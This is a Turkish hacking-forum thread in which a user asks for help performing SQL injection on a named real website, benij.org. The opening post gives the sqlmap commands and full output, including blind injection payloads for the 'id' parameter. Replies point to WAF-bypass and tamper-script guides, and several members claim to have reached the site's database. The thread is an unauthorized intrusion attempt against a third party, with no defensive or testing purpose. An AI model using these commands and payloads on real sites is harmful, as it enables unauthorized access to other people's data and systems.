sqlmap hk.

Zenotron · 29 Ara 2017

h-ttp://www.benij.org/blog.php?id=1 site bu arkadaşlar SQL Injection yapmak istiyorum sqlmap kullanıyorum. Yazdığım kod:
sqlmap -u h-ttp://www.benij.org/blog.php?id=1 --dbs
çıktı:

[12:28:56] [INFO] resuming back-end DBMS 'mysql'
[12:28:56] [INFO] testing connection to the target URL
[12:28:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9075=9075 AND 'hEPc'='hEPc

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'jQlp'='jQlp
---
[12:28:57] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[12:28:57] [INFO] fetching database names
[12:28:57] [INFO] fetching number of databases
[12:28:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:28:57] [INFO] retrieved:
[12:28:57] [WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases

[12:28:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[12:29:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[12:29:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:29:08] [ERROR] unable to retrieve the number of databases
[12:29:08] [INFO] falling back to current database
[12:29:08] [INFO] fetching current database
[12:29:08] [INFO] retrieved:
[12:29:09] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)

[12:29:21] [CRITICAL] unable to retrieve the database names
[12:29:21] [WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 42 times
[*] shutting down at 12:29:21

Sitede SQL açığı yokmu acaba? Hatanın sebebini bilen yazabilir mi lütfen. Konuyu bir süre güncel tutacağım.

Dex1337 · 29 Ara 2017

Belki bypasslıyabilirsin şu konuya bakarsan.

http://www.turkhackteam.org/web-ser...njection-saldirisinda-waf-bypass-yontemi.html

Zenotron · 29 Ara 2017

Erzurumluu' Alıntı:
Belki bypasslıyabilirsin şu konuya bakarsan.

http://www.turkhackteam.org/web-ser...njection-saldirisinda-waf-bypass-yontemi.html

Pek işe yaramadı maalese

Dex1337 · 29 Ara 2017

Umarım yardımcı olur

http://www.turkhackteam.org/web-ser...qlmap-tamper-kullanimi-ve-diger-komutlar.html
http://www.turkhackteam.org/web-server-guvenligi/655142-sql-injection-manuel.html

ATABÖRÜ · 29 Ara 2017

Açıktan Yararlanamamışsın Başka Site Dene Veya Sqlmap'İ Bypass Edememişsindir

Zenotron · 29 Ara 2017

Erzurumluu' Alıntı:
Umarım yardımcı olur

http://www.turkhackteam.org/web-ser...qlmap-tamper-kullanimi-ve-diger-komutlar.html
http://www.turkhackteam.org/web-server-guvenligi/655142-sql-injection-manuel.html

Hocam mesele uygun tamperi bulmak mı? randomcase işe yaramadı(sqlmap -u BeniJ.org - Website of Beni Johnson - Prayer, Intecession --tamper randomcase --dbs)

Zenotron · 30 Ara 2017

Birisi bu siteye SQL Injection yapabilir mi?

Byzikenzi · 30 Ara 2017

benij_db adında bir tane database var

Zenotron · 30 Ara 2017

Byzikenzi' Alıntı:
benij_db adında bir tane database var

Peki nasıl buldun? sqlmap ile mi?

Matrix24 · 30 Ara 2017

url yı yanlış yazmıssın duzeltıp tekrar dene url yı kontrol et bak nasıl yanlış yazmışsın

Matrix24 · 30 Ara 2017

h-ttp://www.benij.org/blog.php?id=1 dıye progrma yazarsan bunun yanlış url oldugunu sana soyler
en bastakı h- dekı - yi silip http sseklınde yaz

Zenotron · 30 Ara 2017

Matrix24' Alıntı:
h-ttp://www.benij.org/blog.php?id=1 dıye progrma yazarsan bunun yanlış url oldugunu sana soyler
en bastakı h- dekı - yi silip http sseklınde yaz

Hocam url'yi bilerek buraya yazarken h- diye yazdım. yoksa programa yazarken zaten http şeklinde yazıyordum.

Matrix24 · 30 Ara 2017

BerkayB2' Alıntı:
Hocam url'yi bilerek buraya yazarken h- diye yazdım. yoksa programa yazarken zaten http şeklinde yazıyordum.

sitede acık var ve bende hata vermıyor

DarkGuardian82 · 30 Ara 2017

h-ttp://www.benij.org/blog.php?id=1

URL yanlış dikkat edersen çözüm bumu ?

Zenotron · 30 Ara 2017

DarkGuardian82' Alıntı:
h-ttp://www.benij.org/blog.php?id=1

URL yanlış dikkat edersen çözüm bumu ?

Hocam URL'yi bilerek buraya yanlış yazdım programa yazarken yanlış yazmıyorum.

Zenotron · 30 Ara 2017

Matrix24' Alıntı:
sitede acık var ve bende hata vermıyor

Peki databaselere ulaşabilidnizmi

Banjamen · 31 Ara 2017

Db ye ulaştım benij_db de içi boş

ATABÖRÜ · 31 Ara 2017

BerkayB2' Alıntı:
//güncel

//Güncel Çok Fazla Yapmışsın Gereksiz Postm'Mu Kasıyosun ?

Zenotron · 31 Ara 2017

Banjamen' Alıntı:
Db ye ulaştım benij_db de içi boş

Peki nasıl ulaştınız bende neden hata çıktı?

Zenotron · 31 Ara 2017

Kutay10' Alıntı:
//Güncel Çok Fazla Yapmışsın Gereksiz Postm'Mu Kasıyosun ?

.
Amacım post kasmak değil konunun güncel olması kaybolmasın diye. Çünkü henüz çözülmedi

sqlmap hk.

Uzman üye

Uzman üye

Uzman üye

Uzman üye

Kıdemli Üye

Uzman üye

Uzman üye

Üye

Uzman üye

Kıdemli Üye

Kıdemli Üye

Uzman üye

Kıdemli Üye

Kıdemli Üye

Uzman üye

Uzman üye

Kıdemli Üye

Kıdemli Üye

Uzman üye

Uzman üye